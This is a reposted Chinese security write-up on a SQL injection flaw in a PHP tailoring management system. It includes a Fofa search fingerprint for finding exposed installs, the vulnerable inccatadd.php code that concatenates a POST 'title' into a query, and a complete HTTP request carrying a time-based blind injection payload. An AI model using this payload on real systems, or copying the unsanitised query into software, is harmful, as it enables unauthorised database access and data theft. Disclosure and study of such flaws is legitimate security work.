0x00 前言
Tailoring管理系统 PHP 可以管理预订、工人工资、供应商和客户,并使用 Web 应用程序测量样式和付款历史,并且使用 PHP、HTML、CSS、JavaScript、Bootstrap 和 MySQL 数据库作为后端开发的.
Fofa指纹:"Fill in the form below to get instant access:" && "assets/js/retina-1.1.0.min.js"
0x01 漏洞分析
位于 inccatadd.php 文件中直接传入参 title 并且直接进入SQL查询,且无任何过滤操作,导致操纵 SQL 查询并执行未经授权的操作.
<?php
if($_POST)
{
$title = $_POST["title"];
////////////////////-------------------- TITLE ki faka??
if(trim($title)=="")
{
$err1=1;
}
if(isset($err1))
$error = $err1;;
if (!isset($error) || $error == 0){
$res = $pdo->exec("INSERT INTO inccat SET title='".$title."'");
if($res){
echo "<div class='alert alert-success alert-dismissable'>
<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>×</button>
NEW INCOME CATEGORY Added Successfully!
</div>";
}else{
echo "<div class='alert alert-danger alert-dismissable'>
<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>×</button>
Some Problem Occurs, Please Try Again.
</div>";
}
} else {
if (!isset($err1) || $err1 == 1){
echo "<div class='alert alert-danger alert-dismissable'>
<button type='button' class='close' data-dismiss='alert' aria-hidden='true'>×</button>
Title Can Not be Empty!!!
</div>";
}
}
}
攻击者可以利用此 SQL 注入漏洞实现数据库未经授权的访问、敏感数据泄露、数据篡改、全面的系统控制,甚至服务中断,对系统安全和业务连续性构成严重威胁.
0x02 漏洞复现
Payload
POST /inccatadd.php HTTP/1.1
Host: 192.168.1.138:2223
Content-Length: 9
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.138:2223
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.1.138:2223/inccatadd.php
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: __utma=123545163.603012537.1718449838.1718449838.1718449838.1; __utmz=123545163.1718449838.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=umavm58j5beqmmme0aof5v26v4
Connection: close
title=123' AND (SELECT 6960 FROM (SELECT(SLEEP(5)))kEHc) AND 'yOHO'='yOHO
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转,RCE
原文始发于微信公众号(星悦安全):国外某CMS存在SQL注入漏洞分析
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论